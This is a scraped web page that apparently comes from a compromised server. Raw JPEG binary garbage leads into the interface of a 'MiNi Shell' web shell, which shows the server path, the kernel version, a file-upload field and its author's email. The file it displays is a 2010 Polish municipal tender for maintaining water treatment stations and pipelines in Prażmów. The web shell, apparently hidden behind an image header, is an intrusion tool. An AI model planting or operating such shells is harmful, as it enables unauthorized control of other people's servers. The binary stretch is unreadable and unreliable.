JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100202/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100202/29770-N-2010.html

<p class="kh_header"><b>Wola Prażmowska: Konserwacja stacji uzdatniania wody oraz sieci wodociągowej                             z przyłączami na terenie Gminy Prażmów w 2010r.</b><br>
<b>Numer ogłoszenia: 29770 - 2010; data zamieszczenia: 02.02.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy Prażmów , Prażmów,  ul. Piotra Czołchańskiego 1, 05-505 Wola Prażmowska, woj. mazowieckie, tel. 022 7270177, faks 022 7270522.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.prazmow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Konserwacja stacji uzdatniania wody oraz sieci wodociągowej                             z przyłączami na terenie Gminy Prażmów w 2010r..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> I.	Przedmiotem  zamówienia jest: 

Konserwacja czterech ujęć wody i sieci wodociągowych z przyłączami oraz agregatu prądotwórczego o mocy 100 kVA do awaryjnego zasilania ujęć wody w Gminie Prażmów Stacje wodociągowe o wydajności:
Krupia Wólka= 60 m3h, Łoś=50 m3h,  Uwieliny = 100 m3h,  Wola Wągrodzka =  50 m3h 
długość sieci wociągowej  129 km w tym  PVC 110 - 100km,  PVC 160  -  29 km
długośc przyłaczy PE - 58 km  , ilość odbiorców  3184 .
a) zapewnienie ciągłości i niezawodności usług zbiorowego zaopatrzenia w wodę w standardzie określonym w umowach o zaopatrzenie w wodę i w Regulaminie dostarczania wody na terenie Gminy Prażmów zatwierdzonego Uchwałą Nr XXXVI 287 2005 Rady Gminy Prażmów z dnia 22 grudnia 2005 r. Jakość wody musi odpowiadać wymaganiom Rozporządzenia Ministra Zdrowia z dnia 29 marca 2007 r. ( Dz. U. Nr 61, poz. 417) 
b) zapewnienie  całodobowego telefonicznego przyjmowania zgłoszeń o awariach . Potwierdzeniem przyjęcia tego zobowiązania będzie złożenie  przez oferenta  oświadczenia załączonego do oferty  przetargowej. W przypadku nie wywiązywania się z tego warunku przez eksploatatora oferta zostanie odrzucona a w przypadku zawarcia umowy i stwierdzeniu nie wywiązywania się przez wykonawcę z tego obowiązku  zostanie  ona rozwiązana z jego winy.
Uruchomienie numeru telefonu zgłoszeń awarii zostanie ogłoszone w sposób zwyczajowo
przyjęty w gminie Prażmów. 
c) wykonywanie niżej wymienionych prac opisanych od pkt II do pkt VI
Koszty związane z wykonaniem prac opisanych w pkt  II do pkt VI powinny zawierać się w miesięcznej kwocie ryczałtowej wpisanej w formularzu ofertowym . 
Nadzór nad przebiegiem realizacji umowy z eksploatatorem w imieniu
zamawiającego prowadzi Gminne Przedsiębiorstwo Wodociągowo-Kanalizacyjne w
Prażmowie, 05-505   Prażmów ul. Piotra Czołchańskiego 17
tel.fax. (022)-736-15-87, zwane w dalszej części GPWK.

II. Opis koniecznych i wymaganych prac związanych z bieżącą konserwacją w stacjach
uzdatniania  wody wWoli Wągrodzkiej, Uwielinach, Krupiej Wólce i Łosiu.

1) wykonywanie czynności konserwacyjnych przewidzianych w dokumentacjach techniczno
ruchowych zamontowanych urządzeń  oraz w instrukcjach obsługi stacji uzdatniania wody, a w szczególności nadzór nad prawidłowym przebiegiem uzdatniania wody, cyklicznego płukania filtrów i innymi pracami gwarantującymi prawidłową pracę stacji 
2) przejęcie obowiązków zamawiającego na czas trwania umowy określonych w  pozwoleniach wodno-prawnych poprzez wykonywanie czynności w nich nakazanych   w załączeniu kopie decyzji wydanych przez Starostę Piaseczyńskiego: 3) usuwanie awarii urządzeń stacji  uzdatniania wody ,  -koszt zakupu materiałów  powyżej 500 zł brutto niezbędnych do usunięcia awarii na danej stacji pokryje GPWK po przedstawieniu  i zaakceptowaniu faktur zakupu,
4) wykonanie robót związanych z zabezpieczeniem antykorozyjnym filtrów w stacjach, 
5) wykonanie minimum raz w okresie związania umową prac konserwacyjnych i czyszczeń zbiorników wyrównawczych wody w stacjach uzdatniania wody z potwierdzeniem wykonania w   sprawozdaniach
6) wykonanie  czyszczeń osadników wód popłucznych, zgodnie z pozwoleniami wodnoprawnymi z potwierdzeniem wykonania w  sprawozdaniach.
7) wykonywanie czynności konserwacyjnych przewidzianych w dokumentacjach techniczno
ruchowych zamontowanych pomp oraz wykonanie minimum raz w okresie związania umową ich czyszczeń w szczególności pomp głębinowych i pośrednich z potwierdzeniem wykonania w   sprawozdaniach.
8) wykonanie prac konserwacyjnych obudów studni oraz prac zabezpieczających przed napływem wód opadowych i gruntowych  do obudów studni,
9) utrzymywanie porządku wewnątrz budynków oraz na terenie  stacji uzdatniania wody oraz stref ochronnych studni głębinowych. 
10)  systematyczne usuwanie na swój koszt nieczystości stałych i płynnych, koszenie trawy min 4 razy w okresie wiosenno letnim , usuwanie śniegu w celu umożliwienia dojazdu do obiektów. Zabezpieczanie terenu stacji przed wejściem osób nieupoważnionych. 
Teren stacji i studni , ma być bezwzględnie zamykany  
11) wykonywanie drobnych napraw konserwacyjnych stacji na koszt własny eksploatatora np.
wymiana: źródeł światła, bezpieczników, olejów w sprężarkach, uzupełnianie podchlorynu sodu,
12) wymiana lub uzupełnianie złóż filtracyjnych w filtrach wg potrzeb wynikających z
dokumentacji ruchowej stacji po uzgodnieniu z zamawiającym. Koszt materiału pokrywa zamawiający wg. przedstawionych i zaakceptowanych faktur zakupu.
13).Wykonywanie poboru i badań wód popłucznych odprowadzanych ze SUW zgodnie z udzielonymi pozwoleniami wodno-prawnymi.
14).Dla każdej stacji należy prowadzić dokumentacje techniczno ruchową stacji wraz z książką eksploatacji urządzeń stacji do której należy wpisywać realizację wyżej wymienionych prac wraz z potwierdzeniem przez  osoby je wykonujące.
15). Wykonywanie dodatkowych badań jakości wody i  w przypadku stwierdzenia przekroczenia parametrów  dopuszczalnych Rozporządzenia Ministra Zdrowia z dnia 29 marca 2007 r. ( Dz. U. Nr 61, poz. 417).

III. Opis koniecznych i wymaganych prac związanych z bieżącą konserwacją sieci i
przyłączy wodociągowych.

1) płukanie sieci wodociągowych -min raz na kwartał  na końcówkach sieci w tym obowiązkowo po wykonywanych pracach na sieci . Płukanie sieci w pozostałych przypadkach  według potrzeb, zaleceń służb nadzoru  i zgłoszeń od odbiorców Wykonywanie prac należy zgłosić na piśmie do kierownika GWPK i wyszczególniać w comiesięcznej specyfikacji wykonanych prac będącej podstawą do wystawienia faktury,
2) sprawdzenie sprawności technicznej hydrantów, uzupełnienie skradzionych nakrętek, malowanie. Koszt materiału pokrywa zamawiający wg. przedstawionych faktur zakupu,
3) wykonywanie powyższych  prac należy zgłosić pisemnie do  GWPK i wyszczególniać w comiesięcznej specyfikacji wykonanych prac będącej podstawą do wystawienia faktury,
4) usuwanie awarii na odrębne zlecenie zamawiającego

IV. Obowiązki eksploatatora od momentu zgłoszenia lub stwierdzenia powstania awarii
urządzeń wodociągowych oraz zadania konieczne do wykonania przez eksploatatora , które są związane z prawidłowym przekazywaniem informacji o powstałych awariach,

1) Działanie eksploatatora w przypadku planowanych przerw w  dostawie wody.
W przypadku przerw w dostawie wody wynikających z planowanych prac konserwacyjno remontowych eksploatator zobowiązany jest powiadomić odbiorców wody  , których wstrzymanie dostawy wody dotyczy min 3 dni robocze przed planowaną przerwą ,  poprzez wywieszenie ogłoszeń w danym rejonie oraz na tablicy ogłoszeń w Urzędzie Gminy Równolegle niezwłocznie należy powiadomić  GWPK w Prażmowie
Powiadomień należy dokonać co najmniej na trzy dni robocze  przed planowanym terminem, Przerwa w dostawie wody nie może trwać dłużej niż  12 godzin. 
W przypadku przerwy w dostawie powyżej 12 godzin należy zapewnić dostawę wody beczkowozami 
2) Działanie eksploatatora w przypadku  przerw w dostawie  wody po wystąpieniu awarii.
W przypadku powstania awarii eksploatator niezwłocznie telefonicznie lub sms-em musi
powiadomić o tym GPWK, sołtysa wsi do której nastąpiło wstrzymania dostawy wody, a w
przypadku przerwy w dostawie wody dla znacznej grupy odbiorców  również Wójta Gminy.
W powiadomieniu GPWK ,należy określić lokalizację awarii, zakres robót oraz szacunkowy czas jej usunięcia oraz szacunkowych kosztach usunięcia awarii..
Eksploatator zobowiązany jest do zabezpieczenia miejsca awarii w ciągu maksimum 2 godzin od powiadomienia lub stwierdzenia powstania awarii. Eksploatator przystąpi do usuwania awarii oraz usunięcia jej skutków niezwłocznie po uzgodnieniu zakresu prac z GPWK. Rozliczenie następuje na podstawie kosztorysu  powykonawczego sporządzonego na podstawie katalogów nakładów rzeczowych wg. stawek podanych w ofercie.( koszty zakupu materiałów wg, faktur zakupu ponosi Zamawiający.) 
W przypadku wystąpienia awarii zagrażającej zdrowiu lub życiu, eksploatator jest zobowiązany do niezwłocznego usunięcia zagrożenia . Rozliczenie poniesionych  kosztów nastąpi po przedstawieniu szczegółowego kosztorysu powykonawczego ,sporządzonego na podstawie katalogów nakładów rzeczowych wg, średnich stawek Sekocenbudu dla woj. Mazowieckiego z kwartału poprzedzającego wystąpienie awarii. 
Do kosztorysu winien być załączony protokół potwierdzony przez zgłaszającego awarię.  

V. Dodatkowe obowiązki eksploatatora związane z konserwacją stacji ujęć wody i sieci
wodociągowych z przyłączami oraz agregatu prądotwórczego do awaryjnego zasilania
energetycznego stacji ujęć wody.
1) planowanie i określanie potrzeb wykonania remontów średnich i kapitalnych w stacjach ujęć wody 
2) planowanie i określanie potrzeb wykonania prac poprawiających funkcjonowanie sieci
wodociągowych zwiększających niezawodność dostaw wody 
3)prowadzenie (aktualizacji) dokumentacji stacji uzdatniania wody oraz sieci wodociągowej.
4) prowadzenie obowiązkowych przeglądów technicznych urządzeń stacji uzdatniania wody  oraz pomiarów  instalacji elektrycznych i odgromowych,
6) dokonywanie czynności odbiorowych  przyłączy indywidualnych,
7) opiniowanie warunków technicznych wykonania przyłącza w przypadkach braku
inwentaryzacji geodezyjnej powykonawczej wodociągu do którego ma zostać wykonane
przyłącze . 

8) wstrzymywanie dostaw wody na odrębne zlecenie zamawiającego w przypadku stwierdzenia nielegalnego poboru wody,
9) zgłaszanie GPWK przypadków stwierdzenia nielegalnego poboru wody np. z hydrantów,
10) otwieranie i zamykanie hydrantów w przypadku poboru wody na zlecenie GPWK,
11) zawarcie z firmami posiadającymi stosowne zezwolenia, umów na  odbiór
osadów z odstojnika wód popłucznych, odbiór ścieków sanitarnych, odbiór ścieków z chlorowni. Posiadanie przez firmę  niezbędnych pozwoleń na wytwarzanie odpadów.
 Prowadzenie gospodarki odpadami powstałymi w czasie eksploatacji i napraw konserwacyjnych zgodnie z zobowiązującymi w tym zakresie przepisami (ustawa o odpadach).
12) zaprowadzenie ewidencji ilościowej i jakościowej dla odpadów powstałych w wyniku
funkcjonowania obiektów i przedkładanie sprawozdań z ewidencji  o ilości i jakości odpadów powstałych i przekazanych do utylizacji- raz na 6 m-cy GPWK w Prażmowie i Urzędowi Gminy. Przechowywanie oryginałów dokumentów potwierdzających dane zawarte w sprawozdaniach o odpadach powstających na obiektach   a po zakończeniu okresu eksploatacji przekazanie Urzędowi Gminy  ich kopi potwierdzonych przez oferenta  za zgodność z oryginałem . Przedstawianie do wglądu  na każde żądanie  do GPWK w Prażmowie lub Zamawiającego ewidencji wytwarzanych odpadów. 
13) umożliwienie dokonania odczytów liczników energii elektrycznej pracownikom ZEWT-S.A.
14) w przypadku  długotrwałego braku zasilania energetycznego tj powyżej 1 godziny na SUW uruchamianie agregatu prądotwórczego  15) zabezpieczenie agregatu przed kradzieżą jego transport na teren SUW w miarę potrzeb.
16) konserwacja agregatu i dokonywanie przeglądów i czynności zgodnie z dokumentacją
techniczno ruchową producenta agregatu.
17) wnioskowanie o dokonywanie na koszt GPWK: napraw agregatu, wymiany części agregatu , wnioskowanie o dokonywanie ubezpieczeń komunikacyjnych.

VI. Obowiązki eksploatatora w przypadku zlecenia przez zamawiającego lub GPWK robót remontowych na terenie stacji ujęć wody lub w innych obiektach objętych przedmiotem zamówienia.

W przypadku zlecenia prac opisanych powyżej np. modernizacji stacji uzdatniania wody , ujęcia wody tj renowacji studni i innych prac, upoważniony przedstawiciel eksploatatora będzie uczestniczył w spisaniu z zewnętrznym wykonawcą przy udziale zamawiającego i upoważnionych pracowników nadzorujących remont ( inwestycję ) protokół wprowadzenia na teren budowy zawierający precyzyjne określeniem stanu obiektu przed rozpoczęciem robót, z wyszczególnieniem kto będzie odpowiadać za dany zakres ewentualnych
prac, a w szczególności należy ścisłe określić możliwości wstrzymywania dostaw wody dla
mieszkańców i zapewnić informowanie o tym fakcie odbiorców wg zasad z pkt IV. Dodatkowo należy określić sankcje finansowe za nie uzgodnione wstrzymanie dostaw wody lub za pogorszenie jakości wody z winy zewnętrznego wykonawcy.
Po zakończeniu prac jak wyzej eksploatator bierze udział jak wyżej z udziałem tych samych osób w podpisaniu protokołu z odbioru robót i  przekazania obiektu eksploatatorowi po wykonaniu robót objętych przedmiotem umowy. Pierwszy obiór  jest bezpłatny.
Następne odbiory w przypadku konieczności usuwania usterek są odpłatne.( wg stawek Sekoncenbudu). Eksploatator może obciążyć dodatkowo wykonawcę wg stawek jednostkowych jak w przypadku awarii.
Dotyczy to również robót jakie będzie zmuszony wykonać eksploatator np. dodatkowe płukania, dodatkowe badania SAN-EPIDU, ewentualne chlorowania sieci. Dodatkowo zamawiający może obciążyć zewnętrznego wykonawcę kosztami dostawy wody odbiorcom beczkowozami , i kosztami ewentualnych upustów za pogorszenie jakości wody oraz odszkodowań z tego tytułu

VII. Wyszczególnienie cen do fakturowania za usuwanie awarii po otrzymaniu zlecenia
przez zamawiającego.

Oferent wypełni tabelę wg poniższego wzoru, która znajduje się we wzorze oferty (zał. nr 1 do siwz). Stawki w niej zawarte będą podstawą do sporządzenia kosztorysu powykonawczego do fakturowania  za usuwanie awarii wg KNR
Rozliczenie kosztu materiałów wg przedstawionych faktur zakupu.
Wyszczególnienie Robocizna r godz. Sprzęt godz. Środek transportu, godz. 
Ceny netto
Narzuty , Koszty ogólne , zysk
Razem

Wyszczególnienie	Robocizna r/godz.	Sprzęt/godz.	Transport godz.
Cena netto			
Narzuty wykonawcy
Bez podatku VAT			
Razem.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 63.13.00.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający oceni spełnienie warunków w oparciu o analizę  załączonych do oferty oświadczeń i dokumentów metodą spełnia /nie spełnia .</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający oceni spełnienie warunków w oparciu o analizę  załączonych do oferty oświadczeń i dokumentów metodą spełnia /nie spełnia .</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający oceni spełnienie warunków w oparciu o analizę  załączonych do oferty oświadczeń i dokumentów metodą spełnia /nie spełnia .</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Oświadczenie wykonawcy, że zobowiązuje się uruchomić całodobowy kontakt telefoniczny w celu usuwania awarii</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 70</li>
<li>2 - stawki za usuwanie awarii - 30</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.prazmow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy  05-505 Prażmów ul. Piotra Czołchańskiego 1.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.02.2010 godzina 12:00, miejsce: Kancelaria zamawiającego (parter) - adres jw..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com